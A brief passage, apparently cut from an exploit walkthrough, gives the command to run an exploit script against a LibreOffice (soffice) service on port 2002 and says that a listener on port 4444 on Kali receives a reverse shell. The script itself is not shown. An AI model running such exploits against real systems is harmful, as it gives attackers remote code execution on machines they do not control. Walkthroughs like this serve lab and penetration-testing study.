Then run it:
python3 exp.py --host localhost --port 2002
With a listener on port 4444 on Kali, the shell arrives with the privileges of the soffice process.